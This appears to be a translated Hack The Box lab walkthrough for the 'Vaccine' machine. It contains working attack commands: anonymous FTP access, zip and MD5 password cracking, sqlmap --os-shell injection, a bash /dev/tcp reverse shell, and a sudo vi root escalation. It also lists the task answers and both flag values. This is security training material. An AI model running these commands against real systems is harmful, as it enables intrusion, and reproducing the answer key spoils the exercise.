Article directory
- 1 Vaccine testing process
-
- 1.1 Management
-
- 1.1.1 FTP anonymous login
- 1.1.2 SQL injection
- 1.2 Privilege Elevation
- 2 Topics
One Vaccine testing process
1.1 Management
1. Port scan
nmap -sV -sC 10.129.191.63
1.1.1 FTP anonymous login
2.FTP allows anonymous login and found backup.zip
ftp 10.129.191.63
Unzip backup.zip, but a password is required:
3. Use john to decrypt backup.zip
# Get the intermediate Hash file zip2john backup.zip > hashes
cat hashes
# Brute force hash cracking john -wordlist=rockyou.txt hashes
Use the obtained password to decompress backup.zip Password: 741852963
4.backup.zip file information leakage
After decompression is completed, index.php, style.css
is found. Check index.php and find username admin and password hash
admin:2cb42f8734ea607eefed3b70af13bbd3
5. Crack the password
Detect which hash the password 2cb42f8734ea607eefed3b70af13bbd3
belongs to
hashid 2cb42f8734ea607eefed3b70af13bbd3
Blast the hash password and get the password qwerty789
echo '2cb42f8734ea607eefed3b70af13bbd3' > hash hashcat -a 0 -m 0 hash rockyou.txt
1.1.2 SQL injection
6. Access port 80, admin: qwerty789 login
7. The search interface uses the $searc variable and tries to inject it
sqlmap -u 'http://10.129.191.63/dashboard.php?search=any + query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch
There is an injection vulnerability. Use the os-shell
parameter of sqlmap to obtain a shell.
sqlmap -u 'http://10.129.191.63/dashboard.php?search=any + query' --cookie="PHPSESSID=3cir5tlpnugpfuqltp7be06o68" -batch --os-shell
8. Get the rebound shell
Enable monitoring:
ncat -lnvp 1234
Execute rebound shell:
bash -c "bash -i > & amp; /dev/tcp/10.10.14.20/1234 0> & amp;1"
Get an interactive shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
Get user flag:
1.2 Privilege Elevation
1. Looking for useful clues in the postgres user shell
The following files were found in the /var/www/html directory:
View the dashboard.php file and find:
2. Use postgres: P@s5w0rd!
for ssh login
3. Check sudo permissions
sudo -l
The output shows that under postgres user permissions, you can use sudo permissions to edit the pg_hba.conf file.
4. Edit pg_hba.conf to get the shell
# Open pg_hba.conf sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# Input, direct input: input without opening edit mode :set shell=/bin/sh
# Open pg_hba.conf sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
# Input, direct input: input without opening the edit mode. Use Enter to exit after editing. :shell
Obtain root permissions:
Find flag:
Two questions
Tags
Web, Network, Vulnerability Assessment, Databases, Injection, Custom Applications, Protocols, Source Code Analysis, Apache, PostgreSQL, FTP, PHP, Reconnaissance, Password Cracking, SUDO Exploitation, SQL Injection, Remote Code Execution, Clear Text Credentials, Anonymous/Guest Access Translation: Web, Network, Vulnerability Assessment, Database, Injection, Custom Application, Protocol, Source Code Analysis, Apache, PostgreSQL Database, FTP, PHP, Reconnaissance, Password Cracking, SUDO Development, SQL Injection, Remote Code Execution, Cleartext Credentials , anonymous access
Connect
To attack the target machine, you must be on the same network.Connect to the Starting Point VPN using one of the following options. It may take a minute for HTB to recognize your connection.If you don't see an update after 2-3 minutes, refresh the page. Translation: To attack the target machine, you must be on the same network. Use one of the following options to connect to your Origin VPN. It may take a minute for HTB to recognize your connection. If you don't see updates after 2-3 minutes, refresh the page.
SPAWN MACHINE
Spawn the target machine and the IP will show here. Translation: Generate the target machine, the IP will be displayed here
TASK 1
Besides SSH and HTTP, what other service is hosted on this box? Translation: Besides SSH and HTTP, what other services are hosted on this box? Answer: FTP
TASK 2
This service can be configured to allow login with any password for specific username. What is that username? Translation: This service can be configured to allow login with any password for a specific username. What is that username? Answer: anonymous
TASK 3
What is the name of the file downloaded over this service? Translation: What is the name of the file downloaded through this service? Answer: backup.zip
TASK 4
What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts? Translation: John The Ripper What script comes with the toolset and generates hashes from a password protected zip archive in a format that allows cracking attempts? Answer: zip2john
TASK 5
What is the password for the admin user on the website? Translation: What is the password for the admin user on the website? Answer: qwerty789
TASK 6
What option can be passed to sqlmap to try to get command execution via the sql injection? 译文:What options can be passed to sqlmap to attempt to execute commands via sql injection? Answer: --os-shell
TASK 7
What program can the postgres user run as root using sudo? Translation: What programs can postgres users run as root using sudo? Answer:vi
SUBMIT FLAG
Submit user flag Translation: user flag Answer: ec9b13ca4d6229cd5cc1e09980965bf7
SUBMIT FLAG
Submit root flag Translation: Submit root flag Answer: dd6e058e814260bc70e9bbdef2715849